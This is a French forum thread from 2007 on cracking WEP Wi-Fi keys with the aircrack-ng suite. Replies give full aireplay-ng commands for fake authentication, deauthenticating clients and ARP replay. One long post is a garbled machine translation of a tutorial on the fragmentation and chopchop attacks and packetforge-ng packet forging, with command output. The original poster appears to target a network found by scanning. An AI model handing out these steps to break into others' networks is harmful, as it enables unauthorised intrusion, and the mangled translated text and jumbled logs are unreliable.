augmentation paquet procédure bonne ? (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 18-10-2007 10:21:38

Jolinar
Membre
Inscription : 10-10-2007
Messages : 21

augmentation paquet procédure bonne ?

Bonjour,

pour préciser mon post précédent et malgré la lecture de plusieurs tutoriaux, je n'arrive pas à prendre des paquets avec aireplay-ng, même en laissant tourner plusieurs heures...
Je possède une carte wifi en PCI chipset Atheros ; je tourne sous Debian, driver madwifi.
Voilà exactement ce que je fais :

./airmon-ng start wifi0 : je choisis ensuite ath1 (mode monitor)
./airodump-ng --channel 11 ath1 : je repere le réseau qui me convient (et cryptage wep)
./aireplay-ng -3 -e truc -b 00:14:7F:78:3D:99 -h 00:19:1D:F5:15:3F -x 100 ath1

avec truc : le nom du réseau, -b son mac bssid et -h mac de la station

et là...3h après..aucun paquets captés...

j'ai oublié qqch ???

merci de vos explications si possible détaillées.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 18-10-2007 11:09:26

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Re : augmentation paquet procédure bonne ?

Salut,
il faut d'abord être associé àl 'access point.

aireplay-ng -1 90 -o 10 -q 1 -e truc -b 00:14:7F:78:3D:99 -h 00:19:1D:F5:15:3F ath1

Les paramètres o et q ne sont pas obligatoires mais ça marche mieux avec certains AP.

Ensuite ..

aireplay-ng -3 ...

Permet de réinjecter des paquets ARP capturés pour générer du traffic dans le réseau et par conséquent générer des IVs. La condition pour que cela marche est de capturer une requete ARP. Tu peux facilement générer une requète ARP à partir d'un client connecté à ton réseau WIFI en faisant un ping vers une adresse IP locale non existante.

Cette requète devrait etre capturée par ta machine faisant l'attaque et dans ta fenetre de aireplay-ng -3 tu devrais voir l'injection.

Tout est expliqué ici

Hors Ligne

#3 18-10-2007 12:08:04

Jolinar
Membre
Inscription : 10-10-2007
Messages : 21

Re : augmentation paquet procédure bonne ?

merci bcp, je vais essayer à midi, je vous tiens au courant !

Hors Ligne

#4 18-10-2007 12:22:20

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : augmentation paquet procédure bonne ?

Non il y a plus simple, tu fais comme tu as écris plus haut, mais dans une autre fenetre (airodump et aireplau-ng continuant à tourner en parrallèle) tu tapes

aireplay-ng -0 1 -a ......  -c ...... ath1      ( après -c tu met l'adresse mac de la station.)  ça va la deconnecter et quand elle va se reconnecter tu vas recuperer des ARP et ça devrait demarrer.

Si ça marche pas essaye -0 3 (ou plus)

Hors Ligne

#5 18-10-2007 14:02:37

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Re : augmentation paquet procédure bonne ?

wxcvbn a écrit :

Non il y a plus simple, tu fais comme tu as écris plus haut, mais dans une autre fenetre (airodump et aireplau-ng continuant à tourner en parrallèle) tu tapes

aireplay-ng -0 1 -a ......  -c ...... ath1      ( après -c tu met l'adresse mac de la station.)  ça va la deconnecter et quand elle va se reconnecter tu vas recuperer des ARP et ça devrait demarrer.

Si ça marche pas essaye -0 3 (ou plus)

Plus simple ? je ne suis pas sûr. Dans les deux cas, il s'agit d'une seule commande.

Pour donner plus de précision, aireplay-ng -0 ... fait le dé-authentification de toutes (ou une) stations connectées à l'AP. On peut noter que ce n'est pas très "discret" comme action, en effet, on déconnecte complètement une station du réseau wifi.

Deuxième chose, quand une station se reconnecte au réseau, elle ne génère pas obligatoirement de requête ARP.  Donc, entre faire un ping ou une déconnection ... à voir.

cheers

Hors Ligne

#6 18-10-2007 14:59:01

Jolinar
Membre
Inscription : 10-10-2007
Messages : 21

Re : augmentation paquet procédure bonne ?

j'ai essayé rapidos à midi, ça n'a pas l'air concluant...toujours ARP 0 requests

Hors Ligne

#7 18-10-2007 15:44:43

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : augmentation paquet procédure bonne ?

C'est pas rapido qu'il faut essayer... Tu avais bien une station de présente au moins sous airodump ?  (je parle pas de ce qui apparait apres avoir tapé aireplay -1 0......)

Hors Ligne

#8 18-10-2007 15:56:57

Jolinar
Membre
Inscription : 10-10-2007
Messages : 21

Re : augmentation paquet procédure bonne ?

beh parfois oui et parfois non mais si elle apparait c'est toujours 00:19:1D:F5:15:3F...
à midi elle n'apparaissait pas...

Hors Ligne

#9 18-10-2007 20:32:27

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Re : augmentation paquet procédure bonne ?

S'il n'y a pas de station connectée tu vas avoir du mal à avoir une requête ARP ...

Il y a des techniques de crack WEP sans stations sans fil connectées (mais avec des stations connectées en Ethernet) mais je crois que tu devrais d'abord comprendre un crack simple de clé WEP avant de te lancer dans des techniques plus poussées.

Encore une fois, le site/wiki d'aircrack est une mine d'or et t'y trouveras toutes les informations nécessaires

cheers.

Dernière modification par Tex-Twil (19-10-2007 10:53:49)

Hors Ligne

#10 19-10-2007 10:25:01

Jolinar
Membre
Inscription : 10-10-2007
Messages : 21

Re : augmentation paquet procédure bonne ?

tu peux m'expliquer pour l'attaque wifi pour ceux qui sont uniquement connecté en ethernet stp ?
genre marche à suivre...
merci bcp

Hors Ligne

#11 19-10-2007 10:52:16

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Re : augmentation paquet procédure bonne ?

Jolinar a écrit :

tu peux m'expliquer pour l'attaque wifi pour ceux qui sont uniquement connecté en ethernet stp ?
genre marche à suivre...
merci bcp

NON !

Comme je viens de le dire, si tu ne réussis pas à faire un attaque "normale" ça va être difficile de faire celle avec des clients non wifi. Ensuite ... si tu avais pris le peine de regarder le lien que j'ai donnée, t'aurais certainement remarqué que toutes les attaques y sont très clairement expliquées !!!!

mad

Dernière modification par Tex-Twil (19-10-2007 10:59:27)

Hors Ligne

#12 19-10-2007 11:15:19

Jolinar
Membre
Inscription : 10-10-2007
Messages : 21

Re : augmentation paquet procédure bonne ?

excuse moi je vais regarder de plus près alors

Hors Ligne

#13 19-10-2007 11:52:39

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Hors Ligne

#14 21-10-2007 10:44:17

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Re : augmentation paquet procédure bonne ?

Alors tu t'en sors ?

Hors Ligne

#15 22-10-2007 10:40:24

Jolinar
Membre
Inscription : 10-10-2007
Messages : 21

Re : augmentation paquet procédure bonne ?

merci bcp pour votre patience, la technique pour l'ethernet a marché nickel !

Hors Ligne

#16 22-10-2007 13:20:54

killbill
Membre
Inscription : 28-06-2007
Messages : 323

Re : augmentation paquet procédure bonne ?

Introduction
Il y a plusieurs fois quand un réseau sans fil n'y a aucun client sans fil associé et il n'y a aucune demande d'ARP venant du côté de câble. Cette classe de travaux dirigés décrit comment forcer la clef WEP quand il n'y a aucun client sans fil et il n'y a aucune demande d'ARP venant du côté de câble. Bien que ce sujet ait été discuté plusieurs fois au Forum, cette classe de travaux dirigés est destinée pour adresser le sujet plus en détail et fournir des exemples travaillants.
Si là ARP des demandes étant l'émission du côté de fil, donc l'authentification fausse standard combinée avec la demande d'ARP rejoue la technique peut être utilisée.
On le recommande que vous expérimentiez avec votre point d'accès sans fil domestique de devenir familiers avec ces idées et techniques. Si vous ne possédez pas de point d'accès particulier, rappelez-vous s'il vous plaît obtenir la permission du propriétaire avant de jouer avec cela.
Je voudrais reconnaître et remercier l'équipe Aircrack-ng pour produire un si grand outil robuste.
Envoyez-moi s'il vous plaît n'importe quelles réactions constructives, positives ou négatives. Des idées de diagnostic des pannes complémentaires et des bouts(pourboires) sont particulièrement bienvenus.
Suppositions
D'abord, cette solution assume :
Vous utilisez des conducteurs rapiécés pour l'injection. Utilisez l'essai d'injection pour confirmer que votre carte peut injecter avant la manière d'agir.
Vous êtes physiquement de près assez pour envoyer et recevoir des paquets de point d'accès. Rappelez-vous que juste parce que vous pouvez recevoir les paquets du point d'accès ne signifient pas que vous pouvez pour être capables de transmettre des paquets à l'AP. La force de carte sans fil est typiquement moins alors la force d'AP. Donc vous devez être physiquement de près assez pour vos paquets transmis pour vous étendre et être reçu par l'AP. Vous devriez confirmer que vous pouvez communiquer avec l'AP spécifique par suivant ces instructions.
Il y a quelques paquets de données venant du point d'accès. Les balises et d'autres paquets d'encadrement de gestion sont totalement inutiles pour nos buts dans cette classe de travaux dirigés. Une façon rapide de vérifier est de diriger airodump-ng et voir s'il y a des paquets de données a signifié le point d'accès. Ayant dit que, si vous faites capturer des données du point d'accès d'une autre session, alors cela peut être utilisé. C'est un sujet avancé(promu) et cette classe de travaux dirigés ne fournit pas d'instructions détaillées pour ce cas.
Le point d'accès utilise WEP †œ ouvrent authenticationâ€?. Il ne travaillera pas si †œ la clef partagée authenticationâ€? (SKA) est utilisé. Avec SKA, la seule façon d'être couronné de succès sans présent(cadeau) de clients consiste en ce si vous avez capturé le PRGA xor des données avec une poignée de main airodump-ng ou une attaque d'aireplay-ng précédemment. C'est parce que vous aurez besoin du PRGA xor le fichier pour faire l'authentification fausse avec succès.
Vous utilisez v0.9 d'aircrack-ng. Si vous utilisez une version différente alors certaines des options de commande devraient être changées.
Assurez que tout au-dessus des suppositions est vrai, autrement le conseil qui suit ne travaillera pas. Dans les exemples ci-dessous, vous devrez changer †œ ath0â€? au nom d'interface qui est spécifique à votre carte sans fil.
Dans les exemples, l'option †œ double se précipite on montre bssidâ€? comme â€?--bssidâ€?. Rappelez-vous enlever l'espace entre les deux tirets(élans) en l'utilisant dans la vie réelle. Cela s'applique aussi à â€zajq3x--ivsâ€?.
Équipement utilisé
Dans cette classe de travaux dirigés, voici ce qui a été utilisé :
Adresse de MAC DE PC dirigeant aircrack-ng suite : 00:09:5B:EC:EE:F2
BSSID (adresse de MAC de point d'accès) : 00:14:6C:7E:40:80
ESSID (nom de réseau Sans fil) : Teddy
Canal de point d'accès : 9
Interface sans fil : ath0
Vous devriez cueillir l'information équivalente pour le réseau sur lequel vous travaillerez. Alors changez juste les valeurs dans les exemples ci-dessous au réseau spécifique.
Solution
Vue d'ensemble de Solution
Voici les pas de base que nous passerons :
1 - mettre la carte sans fil l'adresse de MAC
2 - commencer l'interface sans fil dans le mode de moniteur sur le canal d'AP spécifique
3 - utiliser aireplay-ng pour faire une authentification fausse avec le point d'accès
4 - utiliser aireplay-ng chopchop ou l'attaque de fragmenation pour obtenir PRGA
5 - utiliser packetforge-ng pour créer un paquet arp utilisant le PRGA obtiennent dans le pas précédent
6 - commencer airodump-ng sur le canal d'AP avec le filtre pour bssid pour rassembler(prendre) nouvel IVs unique
7 - injecter le paquet arp créé dans le pas 5
8 - dirigé aircrack-ng pour forcer la clef utilisant l'IVS rassemblé
Pas 1 - Jeu la carte sans fil adresse de MAC
Franchement dit, nous ne changerons pas la carte sans fil l'adresse de MAC.
C'est un rappel pour utiliser votre carte sans fil l'adresse de MAC comme le MAC source. Je le mentionne explicitement comme un rappel pour utiliser l'adresse de MAC réelle de votre carte dans †œ le Pas 3 - truque authenticationâ€? si vous rejouez des données d'une autre session. Des instructions détaillées peuvent être trouvées dans le FAQ(FOIRE AUX QUESTIONS): Comment change-je l'adresse de MAC de ma carte ?.
Le pas 2 - Commence l'interface sans fil dans le mode de moniteur sur le canal d'AP
Entrez à la commande suivante pour commencer la carte sans fil sur le canal 9 dans le mode de moniteur :
Airmon-ng commencent wifi0 9
Notez : Dans cette commande nous utilisons †œ wifi0â€? au lieu de notre interface sans fil d'†œ ath0â€?. C'est parce que les conducteurs madwifi-ng sont utilisés.
Le système répondra :
Interface       Chipset         Conducteur

Wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent : wifi0) (le mode de moniteur a permis)
Vous remarquerez qu'†œ ath0â€? est annoncé ci-dessus comme étant mis dans le mode de moniteur.
Confirmer l'interface est correctement l'installation, entrer à †œ iwconfigâ€?.
Le système répondra :
Lo        aucune extension sans fil.

Eth0      aucune extension sans fil.

Wifi0     aucune extension sans fil.

Ath0      IEEE 802.11g ESSID : "" Surnom : ""
           Mode:Monitor Frequency:2.452 Point d'Accès de GHz : 00:09:5B:EC:EE:F2   
           la Particule Rate:0 le Ko-s Tx-Power:15 dBm Sensitivity=0/3 
           Retry:off RTS thr:off Fragmentent
           le Chiffrage thr:off key:off
           le Pouvoir(la Puissance) Management:off
           Lie le niveau-98 de Signal Quality=0/94 dBm le niveau-98 Sonore dBm
           Rx nwid:0 invalide Rx crypt:0 invalide Rx frag:0 invalide
           Tx misc:0 Invalide retries:0 excessif Manqué beacon:0
Dans la réponse ci-dessus, vous pouvez voir qu'ath0 est dans le mode de moniteur, sur le 2.452GHz la fréquence qui est le canal 9 et le Point d'Accès montre l'adresse de MAC de votre carte sans fil. Donc tout est bon. Il est important de confirmer toute cette information avant la manière d'agir, autrement les pas suivants ne travailleront pas correctement.
Correspondre à la fréquence au canal, le contrôle : http: // www.rflinx.com/help/calculations / * 2.4ghz_wifi_channels choisissent alors l'†œ Wifi la Manche(le Canal) le Choix et la Manche(le Canal) Overlapâ€? l'étiquette. Cela vous donnera la fréquence pour chaque canal.
Bouts(Pourboires) de Diagnostic des pannes
Si une autre interface a commencé d'autre alors ath0 s'arrêtent alors tous d'abord en utilisant †œ airmon-ng arrêtent athXâ€? où X est chaque interface vous voulez vous arrêter.
Le pas 3 - Utilise aireplay-ng pour faire une authentification fausse avec le point d'accès
C'est un pas très important.
Pour un point d'accès d'accepter un paquet, l'adresse de MAC source doit déjà être associée. Si l'adresse de MAC source que vous injectez n'est pas associée alors l'AP ignore le paquet et fait sortir un †œ DeAuthenticationâ€? le paquet. Dans cet état, aucun nouvel IVs n'est créé parce que l'AP ignore tous les paquets injectés.
Le manque d'association avec le point d'accès est la plus grande raison simple pourquoi l'injection échoue.
Pour s'associer avec un point d'accès, l'utilisation truque l'authentification :
Aireplay-ng-1 0 Teddy-e-a 00:14:6C:7E:40:80-h 00:09:5B:EC:EE:F2 ath0
Où :
-1 moyens truquent l'authentification
0 chronométrage(choix du temps) de réassociation dans secondes
-e Teddy est le nom de réseau sans fil
-a 00:14:6C:7E:40:80 est l'accès dirigent l'adresse de MAC
-h 00:09:5B:EC:EE:F2 est notre carte des adresses de MAC
Ath0 est le nom d'interface sans fil
Le succès ressemble :
18:18:20 Envoi de Demande D'identification
18:18:20 Authentification couronné
de succès 18:18:20 Envoi de Demande d'Association
18:18:20 Association :-couronné de succès)
Ou une autre variation pour points d'accès chicaneurs :
Aireplay-ng-1 6000-o 1-q 10 Teddy-e-a 00:14:6C:7E:40:80-h 00:09:5B:EC:EE:F2 ath0
Où :
6000 - réauthentifier très 6000 secondes. La longue période cause aussi continuent des paquets vivants à être envoyé.
-o 1 - Envoient seulement un jeu de paquets à la fois. Le défaut est multiple et cela confond une certaine AP.
-q 10 - Envoient tiennent des paquets vivants toutes les 10 secondes.
Le succès ressemble :
18:22:32 l'Envoi de la Demande D'identification
18:22:32 l'Authentification couronné
de succès 18:22:32 l'Envoi de la Demande d'Association
18:22:32 l'Association :-couronné de succès)
18:22:42 l'Envoi tient - le paquet vivant
18:22:52 l'Envoi tient - le paquet vivant
* et cetera.
Voici à un exemple de ce qu'une authentification échouée ressemble :
8:28:02 l'Envoi de la Demande D'identification
18:28:02 l'Authentification couronné
de succès 18:28:02 l'Envoi de la Demande d'Association
18:28:02 l'Association :-couronné de succès)
18:28:02 A obtenu un paquet deauthentication!
18:28:05 Envoi de Demande D'identification
18:28:05 Authentification couronné
de succès 18:28:05 Envoi de Demande d'Association
18:28:10 Envoi de Demande D'identification
18:28:10 Authentification couronné
de succès 18:28:10 Envoi de Demande d'Association
Remarquez que l'†œ A obtenu un deauthentication packetâ€? et les nouvelles tentatives continues ci-dessus. Ne passez pas au pas suivant jusqu'à ce que vous ayez l'authentification fausse courant correctement.
Bouts(Pourboires) de Diagnostic des pannes
Quelques points d'accès sont configurés pour seulement permettre aux adresses de MAC choisies d'associer et unir(connecter). Si c'est le cas, vous ne serez pas capables d'avec succès faire l'authentification fausse à moins que vous ne sachiez(connaissiez) une des adresses de MAC dans la liste permise. Voir le contrôle d'accès de MAC intervenant pour régler un problème le bout(pourboire) ici.
Si à tout moment vous voulez confirmer que vous êtes correctement associés doit utiliser tcpdump et regarder les paquets. Commencez une autre session et …
Course :
Tcpdump-n-e-s0-vvv-i ath0
Voici un message d'erreur tcpdump typique que vous cherchez :
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80 DeAuthentication : Classe 3 encadrement reçu de station nonassociée
Remarquez que le point d'accès (00:14:6c:7e:40:80) dit la source (00:09:5B:EC:EE:F2) vous n'êtes pas associés. Signifiant, l'AP ne traitera pas ou acceptera les paquets injectés.
Si vous voulez choisir seulement les paquets DeAuth avec tcpdump alors vous pouvez utiliser : †œ tcpdump-n-e-s0-vvv-i ath0 | grep-i DeAuthâ€?. Vous pouvez devoir tordre l'expression †œ DeAuthâ€? pour choisir les paquets exacts que vous voulez.
Le pas 4 - Utilise aireplay-ng chopchop ou l'attaque de fragmenation pour obtenir PRGA
L'objectif du chopchop et les attaques de fragmentation est d'obtenir un PRGA (l'algorithme genration aléatoire pseudo) le fichier de particule. Ce PRGA n'est pas la clef WEP et ne peut pas être utilisé pour décrypter des paquets. Cependant, il peut être utilisé pour créer de nouveaux paquets pour l'injection. La création de nouveaux paquets sera couverte plus tard dans la classe de travaux dirigés.
Chopchop ou des attaques de fragmentation peuvent devoir obtenir le fichier de particule PRGA. Le résultat est le même ainsi l'utilisation n'importe quel on travaille pour vous. Le pour et contre de chaque attaque est décrit à la page d'aircrack-ng.
Nous couvrirons la fragmentation techninque d'abord. L'anthère de début console la session et dirigé :
Aireplay-ng-5-b 00:14:6C:7E:40:80-h 00:09:5B:EC:EE:F2 ath0
Où :
-5 moyens l'attaque de fragmentation
-b 00:14:6C:7E:40:80 est l'accès dirigent l'adresse de MAC
-h 00:09:5B:EC:EE:F2 est l'adresse de MAC de notre carte et doit correspondre au MAC utilisé dans l'authentification fausse
Ath0 est le nom d'interface sans fil
Le système répondra :
Aireplay-ng-5-b 00:14:6C:7E:40:80-h 00:09:5B:EC:EE:F2 ath0                 
Attendant un paquet de données...
Lisez 127 paquets...
         
         Taille : 114, FromDS : 1, ToDS : 0 (WEP)
         
         BSSID = 00:14:6C:7E:40:80
         Dest. MAC = 01:00:5E:00:00:FB
         MAC Source = 00:40:F4:77:E5:C9
         
         0x0000 : 0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B .... ^ ..... l ~.
         0x0010 : 0040 f477 e5c9 6052 8c00 0000 3073 d265. .w.. ` R. ... 0s.e
         0x0020 : c402 790b 2293 c7d5 89c5 4136 7283 29df .. y. "..... A6r.).
         0x0030 : 4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N. ^._CO .. 7 ? .M ..;
         0x0040 : 8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX ... z. +. >... O.
         0x0050 : 4563 906ème 0d90 88c4 5532 a602 a8ea f8e2 Ec.m.... U2 ......
         0x0060 : c531 e214 2b28 fc19 b9a8 226ème 9c71 6ab1 .1 .. + (...." m.qj.
         0x0070 : 9c9f..
         
         Utilisez ce paquet ? Y
Quand un paquet du point d'accès arrive, entrer à †œ yâ€? pour passer. Vous pouvez devoir essayer quelques-uns pour être couronnés de succès.
Quand couronné de succès, les réétangs de système :
Économie(Sauvetage) de paquet choisi dans
paquet de Données replay_src-0203-180328.cap trouvé!
L'envoi du paquet fragmenté
A obtenu le paquet RELAYÉ!!
Thats notre paquet ARP!
L'essai d'obtenir 384 octets d'un keystream
A obtenu le paquet RELAYÉ!!
Thats notre paquet ARP!
L'essai d'obtenir 1500 octets d'un keystream
A obtenu le paquet RELAYÉ!!
Thats notre paquet ARP!
Sauvant(économisant) keystream dans fragment-0203-180343.xor
Maintenant vous pouvez en construire un paquet avec packetforge-ng 1500
octets keystream
Succès! Le fichier †œ fragment-0203-180343.xorâ€? peut alors être utilisé dans le pas suivant pour produire un paquet arp.
Si l'attaque de fragmentation n'était pas couronnée de succès, vous pouvez alors essayer la technique chopchop ensuite. Course :
Aireplay-ng-4-h 00:09:5B:EC:EE:F2-b 00:14:6C:7E:40:80 ath0
Où :
-4 moyens l'attaque de chopchop
-h 00:09:5B:EC:EE:F2 est l'adresse de MAC de notre carte et doit correspondre au MAC utilisé dans l'authentification fausse
-b 00:14:6C:7E:40:80 est l'accès dirigent l'adresse de MAC
Ath0 est le nom d'interface sans fil
Le système répond :
      Lisez 165 paquets...

         Taille : 86, FromDS : 1, ToDS : 0 (WEP)

         BSSID = 00:14:6C:7E:40:80
         Dest. MAC = FF:FF:FF:FF:FF:FF
         MAC Source = 00:40:F4:77:E5:C9

         0x0000 : 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B .......... l ~.
         0x0010 : 0040 f477 e5c9 603a d600 0000 5fed a222. .w .. ` : ...._ .. "0x0020
         : e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543... H. ...... _ =.. C
         0x0030 : d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 .... j ..... %. [. (S
         0x0040 : 16d4 43fb aebb 3ea1 7101 729e 65ca 6905.. C. .. > .q.r.e.i.
         0x0050 : cfeb 4a72 be46                           .. cadet. F

Utilisez ce paquet ? Y
Vous répondez †œ yâ€? ci-dessus et le système continue.
Économie(Sauvetage) de paquet choisi dans replay_src-0201-191639.cap

Compensez 85 (0 % faits) | xor = D3 | la virgule = 95 | 253 encadrements écrits dans 760ms
la Compensation 84 (1 % fait) | xor = EB | la virgule = 55 | 166 encadrements écrits dans 498ms
la Compensation 83 (3 % faits) | xor = 47 | la virgule = 35 | 215 encadrements écrits dans 645ms
la Compensation 82 (5 % faits) | xor = 07 | la virgule = 4ème | 161 encadrements écrits dans
483ms
la Compensation 81 (7 % faits) | xor = EB | la virgule = 00 | 12 encadrements écrits dans    36ms
la Compensation 80 (9 % faits) | xor = CF | la virgule = 00 | 152 encadrements écrits dans 456ms
la Compensation 79 (11 % faits) | xor = 05 | la virgule = 00 | 29 encadrements écrits dans    87ms
la Compensation 78 (13 % faits) | xor = 69 | la virgule = 00 | 151 encadrements écrits dans 454ms
la Compensation 77 (15 % faits) | xor = CA | la virgule = 00 | 24 encadrements écrits dans    71ms
la Compensation 76 (17 % faits) | xor = 65 | la virgule = 00 | 129 encadrements écrits dans 387ms
la Compensation 75 (19 % faits) | xor = 9E | la virgule = 00 | 36 encadrements écrits dans 108ms
la Compensation 74 (21 % faits) | xor = 72 | la virgule = 00
|
Virgule = 00 | 83 encadrements écrits dans 249ms
Compensation 71 (26 % faits) | xor = A1 | virgule = 00 | 43 encadrements écrits dans 129ms
Compensation 70 (28 % faits) | xor = 3E | virgule = 00 | 98 encadrements écrits dans 294ms
Compensation 69 (30 % faits) | xor = BB | virgule = 00 | 129 encadrements écrits dans 387ms
Compensation 68 (32 % faits) | xor = AE | virgule = 00 | 248 encadrements écrits dans 744ms
Compensation 67 (34 % faits) | xor = FB | virgule = 00 | 105 encadrements écrits dans 315ms
Compensation 66 (36 % faits) | xor = 43 | virgule = 00 | 101 encadrements écrits dans 303ms
Compensation 65 (38 % faits) | xor = D4 | virgule = 00 | 158 encadrements écrits dans 474ms
Compensation 64 (40 % faits) | xor = 16 | virgule = 00 | 197 encadrements écrits dans 591ms
Compensation 63 (42 % faits) | xor = 7F | virgule = 0C | 72 encadrements écrits dans 217ms
Compensation 62 (44 % faits) | xor = 1F | virgule = 37 | 166 encadrements écrits dans 497ms
Compensation 61 (46 % faits) | xor = 5C | virgule = A8 | 119 encadrements écrits dans 357ms
Compensation 60 (48
% Écrit dans 339ms
Compensation 58 (51 % faits) | xor = 25 | virgule = 00 | 184 encadrements écrits dans 552ms
Compensation 57 (53 % faits) | xor = 94 | virgule = 00 | 33 encadrements écrits dans    99ms
Compensation 56 (55 % faits) | xor = F3 | virgule = 00 | 193 encadrements écrits dans 579ms
Compensation 55 (57 % faits) | xor = D6 | virgule = 00 | 17 encadrements écrits dans    51ms
Compensation 54 (59 % faits) | xor = FA | virgule = 00 | 81 encadrements écrits dans 243ms
Compensation 53 (61 % faits) | xor = EA | virgule = 01 | 95 encadrements écrits dans 285ms
Compensation 52 (63 % faits) | xor = 5ème | virgule = 37 | 24 encadrements écrits dans    72ms
Compensation 51 (65 % faits) | xor = 33 | virgule = A8 | 20 encadrements écrits dans    59ms
Compensation 50 (67 % faits) | xor = CC | virgule = C0 | 97 encadrements écrits dans 291ms
Compensation 49 (69 % faits) | xor = 03 | virgule = C9 | 188 encadrements écrits dans 566ms
Compensation 48 (71 % faits) | xor = 34 | virgule = E5 | 48 encadrements écrits dans 142ms
Compensation 47 (73 % faits) | xor = 34 |
Fait)
| xor = 98 | virgule = 40 | 109 encadrements écrits dans 327ms
Compensation 44 (78 % faits) | xor = 3D | virgule = 00 | 242 encadrements écrits dans 726ms
Compensation 43 (80 % faits) | xor = 5E | virgule = 01 | 194 encadrements écrits dans 583ms
Compensation 42 (82 % faits) | xor = AF | virgule = 00 | 99 encadrements écrits dans 296ms
Compensation 41 (84 % faits) | xor = C4 | virgule = 04 | 164 encadrements écrits dans 492ms
Compensation 40 (86 % faits) | xor = CE | virgule = 06 | 69 encadrements écrits dans 207ms
Compensation 39 (88 % faits) | xor = 9ème | virgule = 00 | 137 encadrements écrits dans 411ms
Compensation 38 (90 % faits) | xor = FD | virgule = 08 | 229 encadrements écrits dans 688ms
Compensation 37 (92 % faits) | xor = 13 | virgule = 01 | 232 encadrements écrits dans 695ms
Compensation 36 (94 % faits) | xor = 83 | virgule = 00 | 19 encadrements écrits dans    58ms
Compensation 35 (96 % faits) | xor = 4E | virgule = 06 | 230 encadrements écrits dans 689ms
Envoyé 957 paquets, conjecture actuelle : B9...

L'AP semble laisser tomber des paquets plus court que 35 octets.
Permission de norme workaround : ARP récréation(reconstitution) de coup de
tête(de chute,d'en-tête).

Économie(Sauvetage) plaintext dans replay_dec-0201-191706.cap
Sauvant(Économisant) keystream dans replay_dec-0201-191706.xor

Achevé dans 21 (2.29 bytes/s)
Succès! Le fichier †œ replay_dec-0201-191706.xorâ€? ci-dessus peut alors être utilisé dans le pas suivant pour produire un paquet arp.
Bouts(Pourboires) Utiles
Soyez que le paquet est 68 ou plus octets autrement vous ne pouvez pas avoir assez de données PRGA à subsquently produisent un paquet. Le PRGA capturé doit égaler ou plus grand alors la longueur de paquet que nous voulons produire.
À la maison, pour produire quelques paquets pour forcer chopchop pour commencer, le tintement un non-existant IP sur votre réseau. Cela force un arp d'être l'émission et cela montrera dans chopchop à être utilisé.
Vous pouvez vérifier le paquet décrypté en dirigeant †œ tcpdump-n-vvv-e-s0-r replay_dec-0201-191706.capâ€?. Dans notre exemple ci-dessus :
En lisant du fichier replay_dec-0201-191706.cap, type de liaison IEEE802_11 (802.11) 19:17:06.842866 0us DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:e5:c9 LLC, dsap POIGNE (0xaa), ssap POIGNE (0xaa), cmd 0 × 03 : oui Ethernet (0 × 000000), ethertype ARP (0 × 0806) : arp qui - a 192.168.1.12 disent 192.168.1.1
Si quelque chose arrive à mi-chemin chopchop, vous pouvez la réutilisation le paquet source en entrant †œ aireplay-ng-4 ath0-h 00:09:5B:EC:EE:F2-r replay_src-0201-191639.capâ€?. Le fichier source se rejouant est noté quand chopchop commence.
En prenant le bout(pourboire) précédent plus loin, si vous avez un fichier de capture d'une autre session, vous pouvez l'utiliser comme l'entrée †œ aireplay-ng-4 ath0-h 00:09:5B:EC:EE:F2-r capture-from-some-other-time.cap†?
Bouts(Pourboires) de Diagnostic des pannes
Si le premier paquet que vous choisissez ne travaille pas, essayez donc quelques autres. Parfois il prend plus alors un essai d'être couronné de succès avec l'une ou l'autre attaque.
L'attaque de chopchop ne sera pas couronnée de succès sur quelques points d'accès. Si cela arrive, le mouvement sur l'attaque de fragmentation. Et vice versa.
Assurez-vous que vous êtes correctement associés. Pour le vérifier, suivez les instructions tcpdump dans le pas 2.
Le pas 5 - Utilise packetforge-ng pour créer un paquet arp
Dans le pas précédent, nous avons obtenu PRGA. Il n'importe pas qui attaque a produit le PRGA, tous les deux sont égaux. Ce PRGA est stocké dans les fichiers finissant avec †œ xorâ€?. Nous pouvons alors utiliser ce PRGA pour produire un paquet pour l'injection. Nous produirons un paquet arp pour l'injection. L'objectif est d'avoir le point d'accès réémettent le paquet arp injecté. Quand il rebroacasts cela, de nouveaux IV est obtenu. Tout ceux nouvel IVs sera en fin de compte utilisé pour forcer la clef WEP.
Mais d'abord, laisse produisent le paquet arp pour l'injection en entrant :
Packetforge-ng-0-a 00:14:6C:7E:40:80-h 00:09:5B:EC:EE:F2-k 255.255.255.255-l 255.255.255.255.255-y fragment-0203-180343.xor-w arp-demande
Où :
-0 moyens produisent un paquet arp
-a 00:14:6C:7E:40:80 est l'accès dirigent l'adresse de MAC
-h 00:09:5B:EC:EE:F2 est l'adresse de MAC de notre carte
-k 255.255.255.255 est la destination IP (la plupart d'AP répond 255.255.255.255)
-l 255.255.255.255.255 est la source IP (la plupart d'AP répond 255.255.255.255)
-y fragment-0203-180343.xor est le fichier pour lire le PRGA de
-w l'arp-demande est le nom de fichier pour écrire le paquet arp à
Le système répondra :
A écrit le paquet : arp-demande
Bouts(Pourboires) Utiles
Après la création du paquet, utilisez tcpdump pour le passer en revue d'un point de vue de santé mentale. Voir ci-dessous. Cela semble bon!
